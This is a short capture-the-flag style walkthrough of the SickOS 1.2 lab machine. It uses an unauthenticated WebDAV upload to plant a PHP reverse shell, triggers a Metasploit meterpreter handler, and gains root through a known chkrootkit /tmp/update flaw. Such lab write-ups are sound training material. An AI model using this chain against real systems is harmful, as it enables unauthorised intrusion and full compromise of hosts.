2 minutes
B2R: SickOSv1.2
Executive Summary
This machine had an unprotected folder which allowed uploading of malicious PHP code which could then be
executed remotely. An attacker could then create an unprivileged shell on the victim machine and begin to
explore the system for additional vulnerabilities which could lead to a full compromise. During the
exploration, an outdated version of chkrootkit
was found. By exploiting a known vulnerability in the way
chkrootkit
parses arguments, an attacker could create a malicious file that would later be run by
chkrootkit
as a fully privileged user.
Tools used
- nmap - discovery
- uniscan - web application scanner
- metasploit - exploit framework
- msfvenom - payload generation
- local-linux-enum script - enumeration
Proof of Concept
In order to cut down on typing, once the IP of the victim computer is discovered, it can be added to the
/etc/hosts
.
echo "192.168.1.188 vm" >> /etc/hosts
We begin with scanning the victim’s machine and find ports 80 and 22.
❯❯ nmap -p - -A vm | tee nmap.scan
Navigating to the page and checking its source code reveals nothing
Running uniscan
, a folder named test
is discovered
❯❯ uniscan -qweds -u http://vm/
The listing appeared to be empty but further examination of the /test
path revealed that it responded to
more than just HTTP methods. COPY
and MOVE
seemed to indicate WebDAV.
❯❯ curl -vX OPTIONS vm/test
This path requires no authentication and thus allows attackers to upload files to the web server.
Verifying successful upload:
Having uploaded the reverse shell, the Meterpreter handler is constructed
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 80
run -j
…and the payload is activated.
curl http://vm/test/sshhh.php
Once a shell has been established on the system, an enumeration script reveals what additional vulnerabilities might lead to a full compromise.
The installed version of chkrootkit
is outdated and vulnerable to a code execution exploit.
The ExploitDB gives the following description:
Using Metasploit, we create another handler and payload, using the chkrootkit
module. This module will
create/overwrite the /tmp/update
file with the reverse tcp shell of your choosing. The next time
chkrootkit
is run, this update file will connect back to the attacker computer designated in the payload.
356 Words
2016-12-20 23:45 -0500